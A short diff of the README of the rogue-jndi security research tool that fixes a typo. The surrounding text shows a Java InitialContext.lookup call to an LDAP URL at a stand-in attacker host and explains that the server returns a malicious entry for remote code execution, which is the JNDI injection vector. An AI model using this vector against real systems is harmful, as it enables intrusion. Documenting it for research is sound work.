veracode-research/rogue-jndi/README.md

 ```java
 InitialContext.lookup("ldap://your_server.com:1389/o=reference");
 ```
-It will initiate a connection from the vulnerable clinet to the local LDAP server.
+It will initiate a connection from the vulnerable client to the local LDAP server.
 Then, the local server responds with a malicious entry containing one of the payloads, that can be useful to achieve a Remote Code Execution.

 ### Motivation